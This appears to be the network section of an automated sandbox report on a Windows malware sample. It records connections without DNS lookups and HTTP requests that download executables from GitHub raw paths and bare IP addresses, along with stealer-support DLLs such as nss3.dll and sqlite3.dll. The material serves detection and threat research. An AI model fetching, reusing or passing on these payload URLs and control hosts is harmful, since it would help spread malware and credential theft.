                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCE0C0 recv,recv,recv,recv,0_2_00BCE0C0
                              Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
                              Source: global trafficHTTP traffic detected: GET /Urijas/moperats/raw/refs/heads/main/biyjdfjadaw.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /Urijas/moperats/raw/refs/heads/main/ktyihkdfesf.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /Urijas/moperats/refs/heads/main/ktyihkdfesf.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /Urijas/moperats/refs/heads/main/biyjdfjadaw.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: toptek.sbsConnection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /Urijas/moperats/raw/refs/heads/main/ktyihkdfesf.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /Urijas/moperats/raw/refs/heads/main/biyjdfjadaw.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2,es_dfp:72fefd38 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/ddllog?async=doodle:306735258,slot:22,type:1,cta:0 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /Urijas/moperats/refs/heads/main/ktyihkdfesf.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /Urijas/moperats/refs/heads/main/biyjdfjadaw.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /files/Krokodyl02/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /files/karl/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /TQIuuaqjNpwYjtUvFojm1734579850?argument=qVzcqauEInmPu2zy1734815809 HTTP/1.1Host: home.twentytk20ht.topAccept: */*
                              Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/geopoxid/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/zhigarko/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/kardanvalov88/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
